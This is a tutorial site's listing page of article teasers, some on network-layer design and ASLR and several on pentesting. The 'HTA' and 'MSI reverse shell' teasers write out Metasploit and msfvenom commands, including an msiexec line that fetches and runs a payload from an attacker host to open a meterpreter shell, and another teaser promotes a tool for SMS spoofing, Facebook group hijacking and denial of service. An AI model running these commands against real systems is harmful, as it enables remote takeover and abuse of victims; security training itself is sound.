Found 1301 Articles for MCA

Store – and – Forward Packet Switching

Moumita
Updated on 28-Nov-2020 08:14:15

13K+ Views

In telecommunications, store − and − forward packet switching is a technique where the data packets are stored in each intermediate node, before they are forwarded to the next node. The intermediate node checks whether the packet is error−free before transmitting, thus ensuring integrity of the data packets. In general, the network layer operates in an environment that uses store and forward packet switching.Working PrincipleThe node which has a packet to send, delivers it to the nearest node, i.e. router. The packet is stored in the router until it has fully arrived and its checksum is verified for error detection. ... Read More

Network Layer Design Issues

Moumita
Updated on 28-Nov-2020 08:12:16

34K+ Views

The network layer or layer 3 of the OSI (Open Systems Interconnection) model is concerned delivery of data packets from the source to the destination across multiple hops or links. It is the lowest layer that is concerned with end − to − end transmission. The designers who are concerned with designing this layer needs to cater to certain issues. These issues encompasses the services provided to the upper layers as well as internal design of the layer.The design issues can be elaborated under four heads −Store − and − Forward Packet SwitchingServices to Transport LayerProviding Connection Oriented ServiceProviding Connectionless ... Read More

Functions of the Network Layer

Moumita
Updated on 28-Nov-2020 08:11:25

19K+ Views

The main function of the network layer or layer 3 of the OSI (Open Systems Interconnection) model is delivery of data packets from the source to the destination across multiple hops or links. It also controls the operation of the subnet.The functions are elaborated as below −When data is to be sent, the network layer accepts data from the transport layer above, divides and encapsulates it into packets and sends it to the data link layer. The reverse procedure is done during receiving data.The network layer is responsible for routing packets from the source host to the destination host. The ... Read More

The Computer Network Layer

Moumita
Updated on 28-Nov-2020 08:11:02

664 Views

The network layer or Layer 3 of the OSI (Open Systems Interconnection) model is responsible for the source to destination delivery of data packets across multiple hops or nodes. It controls the operation of the subnet.The position of the network layer in the OSI model is depicted in the following diagram −Functions of the Network LayerThe network layer is responsible for routing packets from the source host to the destination host. The routes can be based upon static tables that are rarely changed; or they can be automatically updated depending upon network conditions.Many networks are partitioned into sub-networks or subnets. ... Read More

Pentesting using Docker

Ajay yadav
Updated on 23-Sep-2020 12:38:05

260 Views

You will learn how to configure vulnerable web applications (DVWA) with the help of docker in easy steps. Docker is a third-party tool developed to create an isolated environment to execute any application. These applications are run using containers. These containers are unique because they bring together all the dependencies of an application into a single package and deploy it. Hit these commands to install and configure it as;apt updateapt install docker.iosystemctl start dockersystemctl enable dockerConfigure DVWA on DockerDamn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid ... Read More

TheZoo Repository Live Malware Analysis

Ajay yadav
Updated on 23-Sep-2020 12:33:30

1K+ Views

theZoo's allows the study of malware and enable people who are interested in malware analysis to have access to live malware, analyse the ways they operate, and maybe even enable advanced and savvy people to block specific malware within their own environment.git clone https://github.com/ytisf/theZoocd theZoopip install --user -r requirements.txtpython theZoo.pyI recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with ... Read More

Hacking with HTA file (MSHTA.exe)

Ajay yadav
Updated on 23-Sep-2020 12:31:54

1K+ Views

The Windows OS utility responsible for running HTA( HTML Application) files that we can run with JavaScript or VBScript. You can interpret these files using the Microsoft MSHTA.exe tool.Metasploit contain the “HTA Web Server” module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.Malicious HTA fileOpen metasploit in Kali linux and hit the following commands to generate a malicious HTA file as;use exploit/windows/misc/hta_serverset srvhost 192.168.1.109set lhost 192.168.1.109exploitNow run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.Read More

Hacking with Santet

Ajay yadav
Updated on 23-Sep-2020 12:30:05

834 Views

This article articulates how to hack using Santet tool which has several different attacks built into one package. It allows you to create payload, Hijack Facebook Group, perform SMS bomber and SMS Spoof attack and finally Denial of Service attack. Follow the instruction below to learn how to install Santet and use it further.Turn on your Kali machine, open a terminal and type ingit clonehttps://github.com/Gameye98/santet-onlineNow change your current directory to santet using the cd command − cd santet-onlineNow give execute permission to the santet.py file by executing this command − chmod -x santet.py, now run python santet.py as following;If everything ... Read More

Get the Reverse Shell with MSI package

Ajay yadav
Updated on 23-Sep-2020 12:27:26

1K+ Views

Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.Launch msiexec attack via msfvenomLet’s generate an MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows;msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msiAt the target end, when the victim execute the 1.msi file on the remote machine with the following utiliy;msiexec /q /i http://192.168.1.109/1.msiThe attacker get the reverse shell of the victim machine by starting multi/handler as the listener.use exploit/multi/handlerset pyaload windows/meterpreter/reverse_tcpset lhost 192.168.1.109exploitRead More

Address Space Layout Randomization (ASLR)

Ajay yadav
Updated on 23-Sep-2020 12:21:13

233 Views

Memory corruption vulnerabilities have plagued software for decades, despite efforts by large companies like Apple, Google, and Microsoft to eradicate them. This article presents some basic facts about ASLR, focusing on the Windows implementation. In addition to covering what ASLR accomplishes to improve security posture, we aim to give defenders advice on how to improve the security of their software, and to give researchers more insight into how ASLR works and ideas for investigating its limitations.Memory corruption vulnerabilities occur when a program mistakenly writes attacker-controlled data outside of an intended memory region or outside intended memory’s scope. This may crash ... Read More

Advertisements